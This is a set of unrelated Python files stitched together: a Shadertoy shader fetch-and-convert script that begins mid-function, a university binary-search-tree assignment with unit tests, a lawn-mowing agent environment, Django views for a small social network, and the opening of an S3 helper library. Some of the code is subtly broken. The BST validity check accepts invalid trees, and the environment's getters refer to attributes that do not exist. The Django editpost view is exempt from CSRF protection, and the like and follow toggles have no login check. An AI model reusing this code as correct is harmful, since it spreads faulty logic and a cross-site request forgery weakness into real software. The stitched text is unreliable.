# schnellschuss und keine wirkliche loesung; hatte einen shader mit kommentar hinter dem kernelnamen
match_kernel=r'void\s+mainImage\s*\(\s*out\s+float4\s+([A-Za-z_]\w*)\s*,\s*float2\s+([A-Za-z_]\w*)\s*\)\s*//[^\n]*\n{'
m = re.search(match_kernel,code)
if m:
fragColor=m.group(1)
code = re.sub(match_kernel,
'__KERNEL__ void '+kernel_name+'(float4 \\1, float2 \\2'+kernel_parameters+')\n{\n'
, code)
# Versuche jetzt am Ende noch etwas reinzuschmieren:
p=code.rfind("}")
if p!=-1:
code=code[0:p] + "\n\n SetFragmentShaderComputedColor("+ fragColor +");\n" +code[p]
else:
print("attention: no kernel found in "+buffer_name)
# Mal versuchen Funktionen zu finden:
code=re.sub(r'(\n\s*)(mat[2-4]|float[1-4]{0,1}|int|void|bool)(\s+[A-Za-z_]\w*\s*\([^\)]*\)\s*{)',r'\g<1>__DEVICE__ \g<2>\g<3>',code)
return code
# ---------------------------------------------------------------------------------------------------------------------
def as_fuse_id(shader_name,shader_id):
"""
Derive an identifier from shader_name.
Remove whitespace, leading digits, special characters, etc to make something that can be used as an identifier out of `shader_name`.
Such an identifier is in particular what's needed as the first parametert to `FuRegisterClass()`.
"""
name = shader_name
# Example: "Fork Who cares? nmbr73 321" -> "Who cares"
name = re.sub(r'^Fork (.+) ([^ ]+) \d+$',r'\1',name)
# Replace all invalid characters with a ' '
name = re.sub(r'[^A-Za-z0-9 ]+',' ', name)
# Put 'D' in front if first character is a digit
name = re.sub(r'^(\d.*)$',r'D\1', name)
# Transform leading characters to upper case
name = name.title()
# Eliminate all spaces
name = ''.join(x for x in name if not x.isspace())
return name
# ---------------------------------------------------------------------------------------------------------------------
def as_fuse_name(shader_name,shader_id):
"""
Derive a fuse name from shader_name.
The fuse name is what is passed as `REGS_Name` to the `FuRegisterClass()` call.
This name is shown in the 'Add Tool' context menu, in the 'Select Tool' dialiog,
in the 'Efects' panel, in the 'About' dialog, etc.
When inserting a node into a composition it's also the fuse name what get's
used - but DaFusion makes it an identifier (to be able to use it in expressions
or export it to settings files) by elimiating whitespace and leading digits.
"""
return as_fuse_id(shader_name,shader_id)
# ---------------------------------------------------------------------------------------------------------------------
def as_kernel_name(shader_name,shader_id):
"""
Derive a kernel function name from shader_name.
"""
return as_fuse_id(shader_name,shader_id)
# ---------------------------------------------------------------------------------------------------------------------
def as_file_name(shader_name,shader_id):
"""
Derive a filename (without suffix) from shader_name.
This filename is used for alle the temporary '.json', '.yaml', '.c', etc. files
generated by `fetch` and it can be used as the filename for the '.md' and '.fuse'
file created by `fuse`.
"""
return as_fuse_id(shader_name,shader_id)
# ---------------------------------------------------------------------------------------------------------------------
def create_json(shader_id):
"""
See if there is a JSON file with the given `shader_id`.
This checks `CONVERSIONS_PATH` and the environments `DOWNLOADS`
folder for a JSON file containing the shader `shader_id`.
@return (string) filename (without '.<ID>.json').
"""
files=[entry for entry in os.scandir(CONVERSIONS_PATH) if entry.is_file() and entry.name.endswith(f".{shader_id}.json")]
if len(files) > 1:
raise Exception(f"multiple files matching '{CONVERSIONS_PATH}*.{shader_id}.json'")
if len(files) == 1:
conv_name = files[0].name
conv_name = conv_name[0:len(conv_name)-len(f".{shader_id}.json")]
return conv_name
# then we have to read and parse the json to get a filename
json_text = None
remove_file = None
# try to read from shader_ID.json file
if json_text == None:
fname = f"shader_{shader_id}.json"
if os.path.isfile(CONVERSIONS_PATH + fname):
print("read {fname} file")
with open(CONVERSIONS_PATH+fname, "r") as f:
json_text=f.read()
remove_file = CONVERSIONS_PATH+fname
# try to read shader_ID.json from downloads
if json_text == None:
fname = f"shader_{shader_id}.json"
downloads=os.getenv('DOWNLOADS')
if downloads!=None and downloads!="" and os.path.isfile(downloads + fname):
print("read {fname} from downloads")
with open(downloads+fname, "r") as f:
json_text=f.read()
# try to fetch from shadertoy.com
if json_text == None:
print("fetch JSON from shadertoy.com")
response = requests.get("https://www.shadertoy.com/api/v1/shaders/" +shader_id+"?key="+os.getenv('APIKEY'),
headers={"user-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"}
)
if response.status_code != 200:
raise Exception("HTTP Error "+str(response.status_code))
json_text = response.text
# no options left if we still got no json (unreachable)
if json_text == None:
raise Exception(f"unable to get json data for {shader_id}")
# extract filename from json data
json_data = json.loads(json_text)
error = json_data.get('Error',None)
if error != None:
raise Exception(error)
if 'Shader' in json_data:
json_data = json_data['Shader']
shader_name = json_data['info']['name']
conv_name = as_file_name(shader_name,shader_id)
# write file
outfilepath = f"{CONVERSIONS_PATH}{conv_name}.{shader_id}.json"
print(f"write to {outfilepath}")
with io.open(outfilepath, 'w') as f:
f.write(json_text)
# delete shader_ID.json if in our folder
if remove_file!=None:
print("delete {remove_file}")
os.remove(remove_file)
return conv_name
# ---------------------------------------------------------------------------------------------------------------------
def read_json(conv_name, shader_id):
"""
Get all the Shadertoy information as a JSON structure.
"""
json_text = None
# --- read file
infilepath = f"{CONVERSIONS_PATH}{conv_name}.{shader_id}.json"
if not os.path.isfile(infilepath):
raise Exception(f"{infilepath} does not exists")
verbose(f"read from {infilepath}")
with open(infilepath, "r") as f:
json_text=f.read()
# --- parse json
json_data = json.loads(json_text)
error = json_data.get('Error',None)
if error != None:
raise Exception(error)
if 'Shader' in json_data:
json_data = json_data['Shader']
# --- fix json data
if not ('username' in json_data['info']):
json_data['info']['username']="N.N."
for entry in json_data['renderpass']:
for input in entry.get('inputs',{}):
if not 'ctype' in input:
input['ctype']=input['type']
if not 'src' in input:
input['src']=input['filepath']
if 'name' in input:
raise Exception("input already has a name?!?")
media=MEDIAMAP.get(input['src'],None)
if media==None:
input['name']=input['src']
else:
input['name']=media['type']+': '+media['name']
return json_data
# ---------------------------------------------------------------------------------------------------------------------
def create_yaml(conv_name, shader_id, json_data):
yaml_filename = f"{conv_name}.{shader_id}.yaml"
if os.path.isfile(CONVERSIONS_PATH+yaml_filename):
return
info = json_data['info']
shader_name = json_data['info']['name']
yaml_data={
'shader':{
'id' : shader_id,
'name' : shader_name,
'author' : info['username'],
'url' : 'https://www.shadertoy.com/view/'+shader_id,
'description' : info['description'],
'tags' : info['tags'],
},
'fuse':{
'id' : as_fuse_id(shader_name,shader_id),
'name' : as_fuse_name(shader_name,shader_id),
'file' : as_file_name(shader_name,shader_id),
'kernel' : as_kernel_name(shader_name,shader_id),
'author' : os.getenv('AUTHOR'),
}
}
if "parentid" in info and "parentname" in info:
yaml_data['shader']['parent']={
'id' : info['parentid'],
'name' : info['parentname'],
'url' : 'https://www.shadertoy.com/view/'+info['parentid'],
}
with io.open(CONVERSIONS_PATH+yaml_filename, 'w', encoding='utf8') as outfile:
yaml.dump(yaml_data,outfile, default_flow_style=False, allow_unicode=True)
# # ---------------------------------------------------------------------------------------------------------------------
# def read_yaml(conv_name, shader_id):
# """
# Get infortmation stored in the YAML file.
# """
# yaml_text = None
# # --- read file
# infilepath = f"{CONVERSIONS_PATH}{conv_name}.{shader_id}.yaml"
# if not os.path.isfile(infilepath):
# raise Exception(f"{infilepath} does not exists")
# verbose(f"read from {infilepath}")
# with open(infilepath, "r") as f:
# yaml_text=f.read()
# yaml_data = yaml.load(yaml_text, Loader=yaml.FullLoader)
# if yaml_data['shader']['id'] != shader_id:
# raise Exception(f"shader id missmatch in yaml file")
# # for old yaml files - can be removed later:
# if not 'kernel' in yaml_data['fuse']:
# shader_name=yaml_data['shader']['name']
# yaml_data['fuse']['kernel'] = as_kernel_name(shader_name,shader_id)
# return yaml_data
# ---------------------------------------------------------------------------------------------------------------------
def create_glsl(conv_name, shader_id, json_data):
glsl_filename = f"{conv_name}.{shader_id}.glsl"
if os.path.isfile(CONVERSIONS_PATH+glsl_filename):
return
glsl_text='''
// Any text before the first marker ist ignored. //
// Do not delete or change these markers! //
// You may want to do some minimal changes in the //
// following code sections to better support the //
// pattern matching that does the preliminaty GLSL //
// to DCTL conversion. //
'''
for entry in json_data['renderpass']:
name = entry['name']
code = entry['code']
glsl_text += '\n// >>> ___ GLSL:['+name+']' + ' '+('_'*(73-len(name))) + ' <<<\n'
glsl_text += code
with io.open(CONVERSIONS_PATH+glsl_filename, 'w') as f:
f.write(glsl_text)
# ---------------------------------------------------------------------------------------------------------------------
def read_glsl(conv_name, shader_id):
"""
Get GLSL code from file.
"""
glsl_text = None
# --- read file
infilepath = f"{CONVERSIONS_PATH}{conv_name}.{shader_id}.glsl"
if not os.path.isfile(infilepath):
raise Exception(f"{infilepath} does not exists")
verbose(f"read from {infilepath}")
with open(infilepath, "r") as f:
glsl_text=f.read()
glsl_data={}
parts = glsl_text.split("\n// >>> ___ GLSL:[")[1:]
for p in parts:
m = re.match(r'([^\]]+)\] _{30,} <<< *\n',p)
if not m:
raise Exception("broken marker 'GLSL: ["+p[0:10]+"...'")
name = m.group(1)
if name in glsl_data:
raise Exception("mulltiple occurences of 'GLSL: ["+name+"]' marker")
code = p[p.find('\n')+1:]
glsl_data[name]=code
return glsl_data
# ---------------------------------------------------------------------------------------------------------------------
def create_assets(json_data):
if NOASSETS:
return
for entry in json_data['renderpass']:
inputs=entry.get('inputs',None)
if inputs==None:
continue
for input in inputs:
src=input['src']
if src==None:
continue
media=MEDIAMAP.get(src,None)
if media != None:
# known asset
filename=selfpath+"./Assets/"+media['folder']+"/"+media['name']+"."+media['suffix']
else:
# unknown media
filename=selfpath+"./Assets/UNKNOWN/"+re.sub(r'/','_',src)
# do nothing if already downloaded
if os.path.exists(filename):
verbose(f"asset '{filename}' already downloaded")
continue
# http get and write file
verbose(f"download asset '{filename}'")
data = requests.get("https://www.shadertoy.com"+src)
with open(filename, 'wb') as f:
f.write(data.content)
# ---------------------------------------------------------------------------------------------------------------------
def create_dctl(conv_name, shader_id, json_data, glsl_data):
dctl_filename = f"{conv_name}.{shader_id}.c"
if os.path.isfile(CONVERSIONS_PATH+dctl_filename):
return
shader_name = json_data['info']['name']
kernel_name = as_kernel_name(shader_name,shader_id)
known_code_parts=['Common','Buffer A','Buffer B','Buffer C','Buffer D','Image','Sound']
code_parts={}
for part in known_code_parts:
code_parts[part]={ 'code' : ''}
for entry in json_data['renderpass']:
name = entry['name']
if not name in known_code_parts:
raise Exception("unknown code section '"+name+"'")
if not name in glsl_data:
raise Exception(f"missing part '{name}' in GLSL")
code = entry['code']
if code != glsl_data[name]:
verbose(f"glsl code changed for '{name}'")
# with io.open(name+'.glsl.txt', 'w') as f:
# f.write(glsl_data[name])
# with io.open(name+'.json.txt', 'w') as f:
# f.write(code)
code = glsl_data[name]
header= "\n" \
"// ----------------------------------------------------------------------------------\n" \
"// - "+name+(" "*(79-len(name)))+"-\n" \
"// ----------------------------------------------------------------------------------\n"
inputs=entry.get('inputs',None)
if inputs!=None and len(inputs)>0:
for input in inputs:
#header=header + "// Connect '"+input['name']+"' to iChannel"+str(input['channel'])+"\n"
header=header + "// Connect "+name+" '"+input['name']+"' to iChannel"+str(input['channel'])+"\n"
code_parts[name]['code'] = header + "\n\n" + patch_webgl(code,kernel_name,name)
code=""
for part in known_code_parts:
code=code + code_parts[part]['code']
with open(CONVERSIONS_PATH+dctl_filename, 'w') as f:
f.write(code)
# ---------------------------------------------------------------------------------------------------------------------
def do_fetch(shader_id):
conv_name = create_json(shader_id)
json_data = read_json(conv_name, shader_id)
create_glsl(conv_name, shader_id, json_data)
glsl_data = read_glsl(conv_name, shader_id)
create_dctl(conv_name, shader_id, json_data, glsl_data)
create_assets(json_data)
create_yaml(conv_name, shader_id, json_data)
#yaml_data = read_yaml(conv_name, shader_id)
# =====================================================================================================================
print("\n#################### Fetch Script ###################")
#print("Aufruf :",sys.argv[0]) #ok
if sys.argv[0] != "fetch.py" and sys.argv[0] != "./fetch.py":
selfpath = os.path.dirname(sys.argv[0])+"\\"
print("#SELFPATH:",selfpath)
print(sys.argv, len(sys.argv))
#print("##Argv2##",id,param,txt)
print("Folder: ",folder)
CONVERSIONS_PATH = selfpath+"\Conversions\\"+folder+"\\"
NOASSETS = False
#VERBOSE = verbose
ID = id
else:
selfpath = ""
parser = argparse.ArgumentParser(description='Fetch fuse source code.')
#parser.add_argument('-f','--force',action='store_true',help='overwrite code if it already exists')
#parser.add_argument('-a','--assets',action='store_true',help='fetch assets (even if they exist)') # TODO
parser.add_argument('-i','--id', help='shadertoy id as used in the URL', required=True)
#parser.add_argument('-nc','--no-cache',action='store_true',help='re-fetch the .json file (assets are not fetched if they exist localy)')
parser.add_argument('-na','--no-assets',action='store_true',help='do not try to download the assets, even if they are not yet existing')
#parser.add_argument('-np','--no-patch',action='store_true',help='do not patch the code for DCTÖL - see normal WebGL in the .c file')
parser.add_argument('-v','--verbose',action='store_true',help='verbose output')
args = parser.parse_args()
#print(args.echo)
NOASSETS = args.no_assets
VERBOSE = args.verbose
ID = args.id
print("\n##PATH##",CONVERSIONS_PATH)
#if not(os.path.isfile(".env")):
if not(selfpath+".env"):
with open(".env", 'w') as f:
f.write( "AUTHOR=\"\"\n"
"APIKEY=\"\"\n"
"DOWNLOADS=\"\"\n"
"FUSEPATH=\"\"\n"
"REPOPATH=\"\"\n"
)
print(".env file created - please enter your credentials to use")
load_dotenv(selfpath+".env")
print("\nENVIRIONMENT ",os.getenv('APIKEY'))
#try:
# do_fetch(args.id,force=args.force,nocache=args.no_cache,noassets=args.no_assets,nopatch=args.no_patch)
#except Exception as e:
# print("ERROR: "+str(e))
do_fetch(ID)
#do_fetch(id) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# To add a new cell, type '# %%'
# To add a new markdown cell, type '# %% [markdown]'
# %% [markdown]
# # **Assignment 6** #
# **Delivery Instructions**: Similar to previous assignments. See this [**Canvas announcement**](https://njit.instructure.com/courses/11882/discussion_topics/42914) for more details.
#
# ---
# #### **Important Note**: If you want to follow the alternative track, as I explained in a previous discussions, you can skip questions marked with ^^. Please let me know that you do that !
# %% [markdown]
# ---
# ### **Q1. Check BST validity** ###
# Recall the definition of a the Node class which can be used for implementing binary trees. Write a function that takes as input such a tree $T$, and outputs True if $T$ is a valid BST, or False otherwise. [Hint: Think recursion]
# %%
# your implementation goes here
from typing import Tuple
import unittest
class Node:
def __init__(self, key):
self.key = key
self.lchild = None
self.rchild = None
# @property
# def key(self):
# return self.key
def checkBSTValidity(T: Node) -> bool:
'''BST rules:
- every node has at MOST 2 children
- a node's left child is <= self(parent)
- a node's right child is >= self(parent)
'''
if T.lchild is None and T.rchild is None:
return True
if T.lchild is not None and T.lchild.key <= T.key:
# venture down
if checkBSTValidity(T.lchild) and T.rchild is None:
return True
return True
if T.rchild is not None and T.rchild.key >= T.key:
# venture down.
if checkBSTValidity(T.rchild) and T.lchild is None:
return True
return True
return False
# '''
# 5
# / \
# / \
# / \
# 3 8
# / \ / \
# 2 4 7 10
# / \
# 1 12
# '''
class NodeCollection:
def __init__(self):
self.n5 = Node('5')
self.n3 = Node('3')
self.n2 = Node('2')
self.n1 = Node('1')
self.n4 = Node('4')
self.n8 = Node('8')
self.n7 = Node('7')
self.n10 = Node('10')
self.n12 = Node('12')
self.n5.lchild = self.n3
self.n5.rchild = self.n8
self.n3.lchild = self.n2
self.n3.rchild = self.n4
self.n2.lchild = self.n1
self.n8.lchild = self.n7
self.n8.rchild = self.n10
self.n10.rchild = self.n12
self.all = [self.n1, self.n2, self.n3, self.n4, self.n5, self.n7, self.n8, self.n10, self.n12]
@property
def all_nodes(self):
return self.all
class test_bst_validity(unittest.TestCase):
def setUp(self):
self.nodes = NodeCollection()
self.all = self.nodes.all_nodes
def test_all(self):
for n in self.all:
self.assertTrue(checkBSTValidity(n), 'failed node in {}'.format(n.key))
# %% [markdown]
# ---
#
#
# ### **Q2. Find the height of a Binary Tree**
#
# Write a function *BT_Height* that takes as input a binary tree and computes its height. [Hint: Again, think recursion]
#
# Side Note: If a BST is fully balanced then its height is exactly $\lceil \log_2 n \rceil$. So, the height computation allows you to check if a tree is fully balanced.
# %%
# your implementation goes here
def BT_Height(T, h=None) -> int:
if h is None:
h = 1 # make this 1 if we want to count root as a level????
else:
h += 1
if T.lchild is None and T.rchild is None:
return h
rv = 0
if T.lchild is not None:
# venture down
rv = BT_Height(T.lchild, h)
if T.rchild is not None:
# venture down.
rv = max(rv, BT_Height(T.rchild, h))
return rv
class test_bst_height(unittest.TestCase):
def setUp(self):
self.nodes = NodeCollection()
self.all = self.nodes.all_nodes
def test_height_n5(self):
exp = 4
act = BT_Height(self.all[4]) # the root 5
print('key is {}'.format(self.all[4].key))
self.assertEqual(exp, act, 'height from root')
def test_height_n8(self):
exp = 3
act = BT_Height(self.all[6]) # node 8
print('key is {}'.format(self.all[6].key))
self.assertEqual(exp, act, 'height from root')
def test_log2height(self):
import math
n = len(self.all)
exp = math.ceil(math.log2(n))
act = BT_Height(self.all[4]) # the root 5
self.assertEqual(exp, act, 'log and height')
# %% [markdown]
# ---
#
#
# ### **Q3. Find the closest leaf** <br>
#
# Write a function *BT_ClosestLeaf* that takes as input a binary tree and computes the distance of the root to its closest leaf.
# %%
# your code goes here
def BT_ClosestLeaf(T: Node) -> Node:
# Base Case
if T is None:
return 2**10000
if T.lchild is None and T.rchild is None:
return 0
# get the min between two downward paths.
rv = BT_ClosestLeaf(T.lchild)
rv = min(rv, BT_ClosestLeaf(T.rchild))
return 1 + rv
class test_root_closest_leaf(unittest.TestCase):
def setUp(self):
self.nodes = NodeCollection()
self.all = self.nodes.all_nodes
def test_root(self):
exp = 2
act = BT_ClosestLeaf(self.all[4]) # the root 5
self.assertEqual(exp, act, 'leaf distance')
# %% [markdown]
# ---
#
#
# ### **Q4^^**. Sorted array to BST
#
# In the lecture we briefly discussed that inserting keys in a random order, will give a balanced tree with high probability. However, it's likely that the tree will not be fully balanced. Suppose now that we have already a sorted array of elements $S$ and we want to convert it to a **fully** balanced search tree. Write a function that accomplishes that goal
# %%
# output should be a Tree.
def sortedToBST(S: list) -> Node:
''' I swear we did this before... '''
if not S:
return None
# get the midpoint as an int
mid = (len(S)) // 2
# mid point is a root candidate.
root = Node(S[mid])
# build out the left which are lt
root.lchild = sortedToBST(S[:mid])
# build out the right which are gt
root.rchild = sortedToBST(S[mid + 1:])
return root
class test_sorted_to_bst(unittest.TestCase):
def setUp(self):
self.arr_1 = [1, 2, 3, 4, 5, 6, 7]
self.nodes = NodeCollection()
self.all = self.nodes.all_nodes
self.arr = list([i.key for i in sorted(self.all, key=lambda x: x.key)])
# 4
# / \
# / \
# 2 6
# / \ / \
# 1 3 5 7
def test_one(self):
act = sortedToBST(self.arr_1)
rv = checkBSTValidity(act)
print_bst(act)
self.assertTrue(rv)
self.assertEqual(3, BT_Height(act), 'height')
def test_two(self):
act = sortedToBST(self.arr)
rv = checkBSTValidity(act)
print_bst(act)
self.assertTrue(rv)
self.assertEqual(4, BT_Height(act), 'height')
def print_bst(node: Node):
if not node:
return
print(node.key),
print_bst(node.lchild)
print_bst(node.rchild)
# %% [markdown]
# ---
# ### **Q5. Find Max in BST**
# Write a function *BST_max* that takes as input a BST and returns the maximum key in it. This function should be iterative.
# %%
def BST_max(T: Node) -> int:
current = T
# always go right....
while(current.rchild):
current = current.rchild
return current.key
class test_find_max_key(unittest.TestCase):
def setUp(self):
self.arr_1 = [1, 2, 3, 4, 5, 6, 7]
self.nodes = NodeCollection()
self.all = self.nodes.all_nodes
self.arr = list([i.key for i in sorted(self.all, key=lambda x: x.key)])
def test_one(self):
act = BST_max(self.all[6])
self.assertEqual('12', act, 'bst max')
# %% [markdown]
# ---
# ### **Q6^^**. Check Red-Black Tree Validity
# In the following cell, I give the definition of a class that can be used to build Red-Black Trees. The *color* attribute is assumed to be 1 or 0, where 1 means 'black' and 0 means 'red'.
# Write a function *checkRBTreeValidity* that takes as input a RB Tree $T$ and outputs True if $T$ satisfies all RB properties we discussed in the lecture, and false otherwise.
#
# **Note 1**: As we discussed in the lecture the 'None' children are considered as black nodes without keys.
#
# **Note 2**: Checking if a RB-Tree is a BST is also part of the question, but for it you can use Q1.
# %%
class RBNode:
def __init__(self, key, color=None):
self.key = key
self.lchild = None
self.rchild = None
if color is None:
self.color = 1 # black 0 = Red
else:
self.color = color
def checkRBValidity(T: RBNode):
'''BST rules:
- every node has at MOST 2 children
- a node's left child is <= self(parent)
- a node's right child is >= self(parent)
RB rules:
- root is black; leaves are black
- red parent is black
- black depth always the same
'''
root = T
# base case..
if root.color != 1:
return False, 0
rv, depth = rb_validity_helper(root.rchild)
return rv, depth
def rb_validity_helper(T: RBNode):
'''return bool and black depth'''
if not T:
return True, 1
if T.color != 1: # if not black...
black_count = 0
if (T.lchild is not None and T.lchild.color == 0): # must be black.
return False, -1
else:
black_count = 1
# normal BST checks.
# - a node's left child is <= self(parent)
# - a node's right child is >= self(parent)
if T.lchild is not None and T.lchild.key > T.key:
return False, -1
if T.rchild is not None and T.rchild.key < T.key:
return False, -1
r, black_count_r = rb_validity_helper(T.rchild)
l, black_count_l = rb_validity_helper(T.lchild)
return all([r, l, black_count_r == black_count_l]), black_count_r + black_count
def create_RB_bst():
root = RBNode(7, color=1)
root.lchild = RBNode(3, 1)
root.rchild = RBNode(18, 0)
root.rchild.lchild = RBNode(10, 1)
root.rchild.rchild = RBNode(22, 1)
root.rchild.lchild.lchild = RBNode(8, 0)
root.rchild.lchild.rchild = RBNode(11, 0)
root.rchild.rchild.rchild = RBNode(26, 0)
return root
class test_RB_BST(unittest.TestCase):
def setUp(self):
self.tree = create_RB_bst()
def test_exist(self):
self.assertIsNotNone(self.tree)
rv, depth = checkRBValidity(self.tree)
self.assertTrue(rv)
self.assertEqual(2, depth)
# %%
if __name__ == '__main__':
unittest.main(verbosity=1)
# %%
|
import numpy as np
class environment():
# this class defines what actions are available, what they do, and how they modify the environment
# this class keeps track of the agents attributes including loss
def __init__(self, agent_position, agent_direction, environment_shape):
# position is a 2 element list containing a coordinate pair [x,y]
# direction is a cardinal direction represented by one of the four characters N, S, E, W
# environment_shape is the shape of the environment matrix
self.environment_shape = environment_shape
self.agent_position = agent_position
self.agent_direction = agent_direction
self.moves = 0
def __can_occupy(self, tile):
# can the agent occupy tile?
return tile[0] != '9' # True if tile is not wood
def __cut_the_grass(self, environment_state):
# if the current space is tall grass then cut it
if environment_state[self.agent_position[0], self.agent_position[1]][0] == '8': # if current space is tall grass
current_tile = environment_state[self.agent_position[0], self.agent_position[1]]
environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '1', 0) # replace with cut grass
return environment_state
def __modify_tile(self, tile, new_value, position):
# returns tile with new_value in position
# "why dont you just use arrays instead of non mutable strings?", mainly cause it makes one hot encoding easier but also cause
# I already did it this way and am only now realizing making a tensor of the lawn instead of the matrix may bave been the better way.
# converting to an array is slow with numpy.fromstring and slow with python list() so I decided to just not convert it
if position == 0:
return new_value + tile[1] + tile[2]
elif position == 1:
return tile[0] + new_value + tile[2]
elif position == 2:
return tile[0] + tile[1] + new_value
else:
raise Exception('invalid tile index ' + position)
def take_action(self, action, environment_state):
# takes the action that was recived and returns an updated environment state
if action == 1:
updated_environment_state = self.advance(environment_state)
elif action == 2:
updated_environment_state = self.pivot_clockwise(environment_state)
elif action == 3:
updated_environment_state = self.pivot_counterclockwise(environment_state)
else:
raise Exception('invalid action_id ' + action)
self.moves += 1
return updated_environment_state
# below I define all actions the agent can take and how they modify the environment
def advance(self, environment_state):
# advance one space in the direction the agent is currently facing
# return updated environment state
current_tile = environment_state[self.agent_position[0], self.agent_position[1]] # defining here for readability
if self.agent_direction == 'N':
environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '1', 2) # exit from north
if self.agent_position[0]-1 != -1 and self.__can_occupy(environment_state[self.agent_position[0]-1, self.agent_position[1]]): # if next space can be occupied
self.agent_position[0] -= 1 # advance
current_tile = environment_state[self.agent_position[0], self.agent_position[1]] # redefine current tile since the agent moved
environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '2', 1) # exit from north # enter from south
elif self.agent_direction == 'S':
environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '2', 2) # exit from south
if self.agent_position[0]+1 != self.environment_shape[0] and self.__can_occupy(environment_state[self.agent_position[0]+1, self.agent_position[1]]): # if next space can be occupied
self.agent_position[0] += 1 # advance
current_tile = environment_state[self.agent_position[0], self.agent_position[1]] # redefine current tile since the agent moved
environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '1', 1) # enter from north
elif self.agent_direction == 'E':
environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '3', 2) # exit from east
if self.agent_position[1]+1 != self.environment_shape[1] and self.__can_occupy(environment_state[self.agent_position[0], self.agent_position[1]+1]): # if next space can be occupied
self.agent_position[1] += 1 # advance
current_tile = environment_state[self.agent_position[0], self.agent_position[1]] # redefine current tile since the agent moved
environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '4', 1) # enter from west
elif self.agent_direction == 'W':
environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '4', 2) # exit from west
if self.agent_position[1]-1 != -1 and self.__can_occupy(environment_state[self.agent_position[0], self.agent_position[1]-1]): # if next space can be occupied
self.agent_position[1] -= 1 # advance
current_tile = environment_state[self.agent_position[0], self.agent_position[1]] # redefine current tile since the agent moved
environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '3', 1) # enter from east
else:
raise Exception('unknown direction')
environment_state = self.__cut_the_grass(environment_state) # if the current space is tall grass then cut it
return environment_state
def pivot_clockwise(self, environment_state):
# rotate direction by 90° clockwise
# return updated environment state
if self.agent_direction == 'N':
self.agent_direction = 'E'
elif self.agent_direction == 'S':
self.agent_direction = 'W'
elif self.agent_direction == 'E':
self.agent_direction = 'S'
elif self.agent_direction == 'W':
self.agent_direction = 'N'
else:
raise Exception('unknown direction')
return environment_state
def pivot_counterclockwise(self, environment_state):
# rotate direction by 90° counterclockwise
# return updated environment state
if self.agent_direction == 'N':
self.agent_direction = 'W'
elif self.agent_direction == 'S':
self.agent_direction = 'E'
elif self.agent_direction == 'E':
self.agent_direction = 'N'
elif self.agent_direction == 'W':
self.agent_direction = 'S'
else:
raise Exception('unknown direction')
return environment_state
# below I define all getters which are just used to interface with the simulation class
def get_done_condition(self, environment_state):
# returns true if the environment is complete (entire lawn is mowed)
return ('800' not in environment_state) # if there are no tall grass blocks then lawn is mowed
def get_action_space(self):
# returns tuple of possible actions as numbers
# mapping:
# 1 = 'advance'
# 2 = 'pivot_clockwise'
# 3 = 'pivot_counterclockwise'
return (1,2,3)
def get_position(self):
# return agents current position
return self.x, self.y
def get_direction(self):
# return agents current direction
return self.direction
def get_reward(self):
# return agents current reward
return -self.moves |
from django.contrib.auth import authenticate, login, logout
from django.db import IntegrityError
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.urls import reverse
from django.contrib.auth.decorators import login_required
from django.core.paginator import Paginator
from django.views.decorators.csrf import csrf_exempt
from .models import User, Post
def index(request):
allpost = Post.objects.order_by("-timestamp").all()
paginator = Paginator(allpost, 10)
page = request.GET.get('page')
return render(request, "network/index.html", {
"allposts": paginator.get_page(page)
})
@login_required(login_url='login')
def newpost(request): # only accepts post request
post = Post(content=request.POST["content"], author=User.objects.get(pk=request.user.pk))
post.save()
return HttpResponseRedirect(reverse('index'))
@login_required(login_url='login')
def userpage(request, userid):
allpost = User.objects.get(pk=userid).posts_created.order_by('-timestamp').all()
paginator = Paginator(allpost, 10)
page = request.GET.get('page')
return render(request, "network/userpage.html", {
"userdisplayed": User.objects.get(pk=userid),
"allposts": paginator.get_page(page)
})
@login_required(login_url='login')
def followfeed(request):
allpost = Post.objects.filter(author__in=request.user.following.all()).order_by('-timestamp')
paginator = Paginator(allpost, 10)
page = request.GET.get('page')
return render(request, "network/followfeed.html", {
"allposts": paginator.get_page(page)
})
def togglelike(request, postid):
post = Post.objects.get(pk=postid)
liked = User.objects.get(pk=request.user.pk).liked_posts
if post not in liked.all():
liked.add(post)
else:
liked.remove(post)
return HttpResponse("done")
def togglefollow(request, userdisid):
userToFollow = User.objects.get(pk=userdisid)
if userToFollow not in request.user.following.all():
request.user.following.add(userToFollow)
else:
request.user.following.remove(userToFollow)
return HttpResponse('done')
@csrf_exempt
def editpost(request):
content = request.POST.get("content")
postid = int(request.POST.get("postid"))
post = Post.objects.get(pk=postid)
if post.author != request.user:
return HttpResponse("error")
post.content = content
post.save(update_fields=["content"])
return HttpResponse("done")
def login_view(request):
if request.method == "POST":
# Attempt to sign user in
username = request.POST["username"]
password = request.POST["password"]
user = authenticate(request, username=username, password=password)
# Check if authentication successful
if user is not None:
login(request, user)
return HttpResponseRedirect(reverse("index"))
else:
return render(request, "network/login.html", {
"message": "Invalid username and/or password."
})
else:
return render(request, "network/login.html")
def logout_view(request):
logout(request)
return HttpResponseRedirect(reverse("index"))
def register(request):
if request.method == "POST":
username = request.POST["username"]
email = request.POST["email"]
# Ensure password matches confirmation
password = request.POST["password"]
confirmation = request.POST["confirmation"]
if password != confirmation:
return render(request, "network/register.html", {
"message": "Passwords must match."
})
# Attempt to create new user
try:
user = User.objects.create_user(username, email, password)
user.save()
except IntegrityError:
return render(request, "network/register.html", {
"message": "Username already taken."
})
login(request, user)
return HttpResponseRedirect(reverse("index"))
else:
return render(request, "network/register.html") |
<filename>s3_library.py
'''Library to encapsulate interactions with AWS S3.
'''
import boto
import fnmatch
import os
import pickle
import sys
from tempfile import NamedTemporaryFile
##with open(os.path.join(os.path.dirname(__file__), 's3_credentials.txt')) as creds:
#with open('/home/ec2-user/code_parallel_stochastic/predictd/s3_credentials.txt') as creds:
# cred_info = dict([elt.strip().split('=') for elt in creds])
